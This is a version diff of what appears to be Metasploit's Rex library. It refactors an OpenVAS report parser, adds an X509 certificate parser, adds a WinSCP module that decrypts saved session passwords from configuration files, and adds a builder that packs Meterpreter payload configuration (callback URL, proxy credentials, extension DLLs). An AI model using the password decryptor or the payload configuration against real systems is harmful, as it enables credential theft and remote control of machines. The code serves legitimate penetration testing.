rex 2.0.8 → 2.0.9

data/lib/rex/parser/openvas_nokogiri.rb

@@ -15,6 +15,12 @@ module Parser
     attrs = normalize_attrs(attrs)
     block = @block
     @state[:current_tag][name] = true
+
+    unless @text.nil?
+      @state[:text_backup] = @text
+      @text = nil
+    end
+
     case name
     when "host"
       @state[:has_text] = true
@@ -25,97 +31,90 @@ module Parser
   def end_element(name=nil)
     block = @block
     case name
-    when "name"
-      return if not in_tag("result")
-      @state[:has_text] = true
-      @state[:vuln_name] = @text.strip if @text
-      @text = nil
-    when "description"
+    when 'name'
+      if in_tag('result')
+        @state[:has_text] = true
+        @state[:vuln_name] = @text.strip if @text
+      end
+    when 'description'
       @state[:has_text] = true
       @state[:vuln_desc] = @text.strip if @text
-      @text = nil
-    when "bid"
-      return if not in_tag("result")
-      return if not in_tag("nvt")
-      @state[:has_text] = true
-      @state[:bid] = @text.strip if @text
-      @text = nil
-    when "cve"
-      return if not in_tag("result")
-      return if not in_tag("nvt")
-      @state[:has_text] = true
-      @state[:cves] = @text.strip if @text
-      @text = nil
-    when "risk_factor"
-      return if not in_tag("result")
-      return if not in_tag("nvt")
-
-      #we do this to clean out the buffer so to speak
-      #if we don't set text to nil now, the text will show up later
-      @state[:has_text] = true
-      @text = nil
-    when "cvss_base"
-      return if not in_tag("result")
-      return if not in_tag("nvt")
-      @state[:has_text] = true
-      @text = nil
-    when "subnet"
-      @state[:has_text] = true
-      @text = nil
-    when "result"
-      return if not in_tag("results")
-      record_vuln
-    when "threat"
-      return if not in_tag("ports")
-      return if not in_tag("port")
-      @state[:has_text] = true
-
-      if not @text.index('(')
-        @state[:name] = nil
-        @state[:port] = nil
-        @state[:proto] = nil
-        @text = nil
-        return
+    when 'bid'
+      if in_tag('result') && in_tag('nvt')
+        @state[:has_text] = true
+        @state[:bid] = @text.strip if @text
       end
-
-      @state[:name] = @text.split(' ')[0] if @text
-      @state[:port] = @text.split('(')[1].split('/')[0] if @text
-      @state[:proto] = @text.split('(')[1].split('/')[1].split(')')[0] if @text
-
-      @text = nil
-    when "host"
+    when 'cve'
+      if in_tag('result') && in_tag('nvt')
+        @state[:has_text] = true
+        @state[:cves] = @text.strip if @text
+      end
+    when 'risk_factor'
+      if in_tag('result') && in_tag('nvt')
+        #we do this to clean out the buffer so to speak
+        #if we don't set text to nil now, the text will show up later
+        @state[:has_text] = true
+      end
+    when 'cvss_base'
+      if in_tag('result')  && in_tag('nvt')
+        @state[:has_text] = true
+      end
+    when 'subnet'
+      @state[:has_text] = true
+    when 'result'
+      record_vuln if in_tag('results')
+    when 'threat'
+      @state[:has_text] = true if in_tag('ports') && in_tag('port')
+    when 'host'
       if in_tag('result')
         @state[:has_text] = true
         @state[:host] = @text.strip if @text
-        @text = nil
-      elsif in_tag('ports')
-        return if not in_tag('port')
+      elsif in_tag('ports') && in_tag('port')
         @state[:has_text] = true
         @state[:host] = @text.strip if @text
-        @text = nil
       end
-    when "port"
+    when 'port'
       if in_tag('result')
         @state[:has_text] = true
-        if not @text.index('(')
+        if @text && @text.index('(')
+          @state[:proto] = @text.split('(')[1].split('/')[1].gsub(/\)/, '')
+          @state[:port] = @text.split('(')[1].split('/')[0].gsub(/\)/, '')
+        elsif @text && @text.index('/')
+          @state[:proto] = @text.split('/')[1].strip
+          @state[:port] = @text.split('/')[0].strip
+        else
+          @state[:proto] = nil
+          @state[:port] = nil
+        end
+
+        if @state[:port] && @state[:port] == 'general'
           @state[:proto] = nil
           @state[:port] = nil
-          @text = nil
-          return
         end
-        @state[:proto] = @text.split('(')[0].strip if @text
-        @state[:port] = @text.split('(')[1].split('/')[0].gsub(/\)/, '') if @text
-        @text = nil
       elsif in_tag('ports')
-        record_service
+        if @text && @text.index('(')
+          @state[:name] = @text.split(' ')[0]
+          @state[:port] = @text.split('(')[1].split('/')[0]
+          @state[:proto] = @text.split('(')[1].split('/')[1].split(')')[0]
+          record_service unless @state[:name].nil?
+        elsif @text && @text.index('/')
+          @state[:port] = @text.split('/')[0]
+          @state[:proto] = @text.split('/')[1]
+          record_service unless @state[:port] == 'general'
+        end
       end
-    when "name"
-      return if not in_tag("result")
+    when 'name'
+      return if not in_tag('result')
       @state[:has_text] = true
-      @text = nil
+    end
+
+    if @state[:text_backup]
+      @text = @state[:text_backup]
+      @state[:text_backup] = nil
     else
       @text = nil
     end
+
     @state[:current_tag].delete name
   end
 
@@ -153,8 +152,6 @@ module Parser
   end
 
   def record_service
-    return if not @state[:name]
-
     service_info = {}
     service_info[:host] = @state[:host]
     service_info[:name] = @state[:name]

data/lib/rex/parser/winscp.rb

@@ -0,0 +1,108 @@
+require 'rex/parser/ini'
+
+module Rex
+module Parser
+  module WinSCP
+    PWDALG_SIMPLE_MAGIC = 0xA3
+    PWDALG_SIMPLE_FLAG = 0xFF
+
+    def read_and_parse_ini(filename)
+      file = File.read(filename)
+      return if file.to_s.empty?
+      parse_ini(file)
+    end
+
+    def parse_protocol(fsprotocol)
+      return 'Unknown' if fsprotocol.nil?
+
+      case fsprotocol
+      when 5 then 'FTP'
+      when 0 then 'SSH'
+      else
+        'Unknown'
+      end
+    end
+
+    def parse_ini(file)
+      results = []
+      raise RuntimeError, 'No data to parse' if file.nil? || file.empty?
+
+      ini = Rex::Parser::Ini.from_s(file)
+
+      if ini['Configuration\\Security']
+        # if a Master Password is in use we give up
+        if ini['Configuration\\Security']['UseMasterPassword'].to_i == 1
+          raise RuntimeError, 'Master Password Set, unable to recover saved passwords!'
+        end
+      end
+
+      # Runs through each group in the ini file looking for all of the Sessions
+      ini.each_key do |group|
+        if group.include?('Sessions') && ini[group].has_key?('Password')
+          # Decrypt our password, and report on results
+          encrypted_password = ini[group]['Password']
+          user = ini[group]['UserName']
+          host = ini[group]['HostName']
+          sname = parse_protocol(ini[group]['FSProtocol'].to_i)
+          plaintext = decrypt_password(encrypted_password, "#{user}#{host}")
+
+          results << {
+            hostname: host,
+            password: plaintext,
+            portnumber: ini[group]['PortNumber'] || 22,
+            username: user,
+            protocol: sname
+          }
+        end
+      end
+
+      results
+    end
+
+    # Decrypts the next character in the password sequence
+    def decrypt_next_char(pwd)
+      if pwd.nil? || pwd.length <= 0
+        return 0, pwd
+      end
+
+      # Takes the first char from the encrypted password and then left shifts the returned index by 4 bits
+      a = pwd[0].hex << 4
+
+      # Takes the second char from the encrypted password
+      b = pwd[1].hex
+
+      # Adds the two results, XORs against 0xA3, NOTs it and then ANDs it with 0xFF
+      result = ~((a + b) ^ PWDALG_SIMPLE_MAGIC) & PWDALG_SIMPLE_FLAG
+
+      # Strips the first two chars off and returns our result
+      return result, pwd[2..-1]
+    end
+
+    def decrypt_password(pwd, key)
+      flag, pwd = decrypt_next_char(pwd)
+
+      if flag == PWDALG_SIMPLE_FLAG
+        _, pwd = decrypt_next_char(pwd)
+        length, pwd = decrypt_next_char(pwd)
+      else
+        length = flag
+      end
+
+      del, pwd = decrypt_next_char(pwd)
+      pwd = pwd[del*2..-1]
+
+      result = ""
+      length.times do
+        r, pwd = decrypt_next_char(pwd)
+        result << r.chr
+      end
+
+      if flag == PWDALG_SIMPLE_FLAG
+        result = result[key.length..-1]
+      end
+
+      result
+    end
+  end
+end
+end

data/lib/rex/parser/x509_certificate.rb

@@ -0,0 +1,92 @@
+# -*- coding: binary -*-
+
+require 'openssl'
+
+module Rex
+module Parser
+
+###
+#
+# This class parses the contents of a PEM-encoded X509 certificate file containing
+# a private key, a public key, and any appended glue certificates.
+#
+###
+class X509Certificate
+
+  #
+  # Parse a certificate in unified PEM format that contains a private key and
+  # one or more certificates. The first certificate is the primary, while any
+  # additional certificates are treated as intermediary certificates. This emulates
+  # the behavior of web servers like nginx.
+  #
+  # @param [String] ssl_cert
+  # @return [String, String, Array]
+  def self.parse_pem(ssl_cert)
+    cert  = nil
+    key   = nil
+    chain = nil
+
+    certs = []
+    ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem|
+      if pem =~ /PRIVATE KEY/
+        key = OpenSSL::PKey::RSA.new(pem)
+      elsif pem =~ /CERTIFICATE/
+        certs << OpenSSL::X509::Certificate.new(pem)
+      end
+    end
+
+    cert = certs.shift
+    if certs.length > 0
+      chain = certs
+    end
+
+    [key, cert, chain]
+  end
+
+  #
+  # Parse a certificate in unified PEM format from a file
+  #
+  # @param [String] ssl_cert_file
+  # @return [String, String, Array]
+  def self.parse_pem_file(ssl_cert_file)
+    data = ''
+    ::File.open(ssl_cert_file, 'rb') do |fd|
+      data << fd.read(fd.stat.size)
+    end
+    parse_pem(data)
+  end
+
+  #
+  # Parse a certificate in unified PEM format and retrieve
+  # the SHA1 hash.
+  #
+  # @param [String] ssl_cert 
+  # @return [String]
+  def self.get_cert_hash(ssl_cert)
+    hcert = parse_pem(ssl_cert)
+
+    unless hcert and hcert[0] and hcert[1]
+      raise ArgumentError, "Could not parse a private key and certificate"
+    end
+
+    Rex::Text.sha1_raw(hcert[1].to_der)
+  end
+
+  #
+  # Parse a file that contains a certificate in unified PEM
+  # format and retrieve the SHA1 hash.
+  #
+  # @param [String] ssl_cert_file
+  # @return [String]
+  def self.get_cert_file_hash(ssl_cert_file)
+    data = ''
+    ::File.open(ssl_cert_file, 'rb') do |fd|
+      data << fd.read(fd.stat.size)
+    end
+    get_cert_hash(data)
+  end
+
+end
+
+end
+end

data/lib/rex/payloads.rb

@@ -1,3 +1,2 @@
 # -*- coding: binary -*-
 require 'rex/payloads/win32'
-require 'rex/payloads/meterpreter'

data/lib/rex/payloads/meterpreter/config.rb

@@ -0,0 +1,154 @@
+# -*- coding: binary -*-
+require 'msf/core/payload/uuid'
+require 'msf/core/payload/windows'
+require 'msf/core/reflective_dll_loader'
+require 'rex/parser/x509_certificate'
+
+class Rex::Payloads::Meterpreter::Config
+
+  include Msf::ReflectiveDLLLoader
+
+  URL_SIZE = 512
+  UA_SIZE = 256
+  PROXY_HOST_SIZE = 128
+  PROXY_USER_SIZE = 64
+  PROXY_PASS_SIZE = 64
+  CERT_HASH_SIZE = 20
+
+  def initialize(opts={})
+    @opts = opts
+    if opts[:ascii_str] == true
+      @to_str = self.method(:to_ascii)
+    else
+      @to_str = self.method(:to_wchar_t)
+    end
+  end
+
+  def to_b
+    config_block
+  end
+
+private
+
+  def is_x86?
+    @opts[:arch] == ARCH_X86
+  end
+
+  def to_str(item, size)
+    @to_str.call(item, size)
+  end
+
+  def to_wchar_t(item, size)
+    to_ascii(item, size).unpack('C*').pack('v*')
+  end
+
+  def to_ascii(item, size)
+    item.to_s.ljust(size, "\x00")
+  end
+
+  def session_block(opts)
+    uuid = opts[:uuid].to_raw
+    exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
+
+    session_data = [
+      0,                  # comms socket, patched in by the stager
+      exit_func,          # exit function identifer
+      opts[:expiration],  # Session expiry
+      uuid                # the UUID
+    ]
+
+    session_data.pack('VVVA*')
+  end
+
+  def transport_block(opts)
+    # Build the URL from the given parameters, and pad it out to the
+    # correct size
+    lhost = opts[:lhost]
+    if lhost && opts[:scheme].start_with?('http') && Rex::Socket.is_ipv6?(lhost)
+      lhost = "[#{lhost}]"
+    end
+
+    url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}"
+    url << "#{opts[:uri]}/" if opts[:uri]
+    url << "?#{opts[:scope_id]}" if opts[:scope_id]
+
+    # if the transport URI is for a HTTP payload we need to add a stack
+    # of other stuff
+    pack = 'A*VVV'
+    transport_data = [
+      to_str(url, URL_SIZE),     # transport URL
+      opts[:comm_timeout],       # communications timeout
+      opts[:retry_total],        # retry total time
+      opts[:retry_wait]          # retry wait time
+    ]
+
+    if url.start_with?('http')
+      proxy_host = ''
+      if opts[:proxy_host] && opts[:proxy_port]
+        prefix = 'http://'
+        prefix = 'socks=' if opts[:proxy_type].downcase == 'socks'
+        proxy_host = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+      end
+      proxy_host = to_str(proxy_host || '', PROXY_HOST_SIZE)
+      proxy_user = to_str(opts[:proxy_user] || '', PROXY_USER_SIZE)
+      proxy_pass = to_str(opts[:proxy_pass] || '', PROXY_PASS_SIZE)
+      ua = to_str(opts[:ua] || '', UA_SIZE)
+
+      cert_hash = "\x00" * CERT_HASH_SIZE
+      cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash]
+
+      # add the HTTP specific stuff
+      transport_data << proxy_host  # Proxy host name
+      transport_data << proxy_user  # Proxy user name
+      transport_data << proxy_pass  # Proxy password
+      transport_data << ua          # HTTP user agent
+      transport_data << cert_hash   # SSL cert hash for verification
+
+      # update the packing spec
+      pack << 'A*A*A*A*A*'
+    end
+
+    # return the packed transport information
+    transport_data.pack(pack)
+  end
+
+  def extension_block(ext_name, file_extension)
+    ext_name = ext_name.strip.downcase
+    ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
+                                                              file_extension))
+
+    extension_data = [ ext.length, ext ].pack('VA*')
+  end
+
+  def config_block
+    # start with the session information
+    config = session_block(@opts)
+
+    # then load up the transport configurations
+    (@opts[:transports] || []).each do |t|
+      config << transport_block(t)
+    end
+
+    # terminate the transports with NULL (wchar)
+    config << "\x00\x00"
+
+    # configure the extensions - this will have to change when posix comes
+    # into play.
+    file_extension = 'x86.dll'
+    file_extension = 'x64.dll' unless is_x86?
+
+    (@opts[:extensions] || []).each do |e|
+      config << extension_block(e, file_extension)
+    end
+
+    # terminate the extensions with a 0 size
+    if is_x86?
+      config << [0].pack('V')
+    else
+      config << [0].pack('Q<')
+    end
+
+    # and we're done
+    config
+  end
+end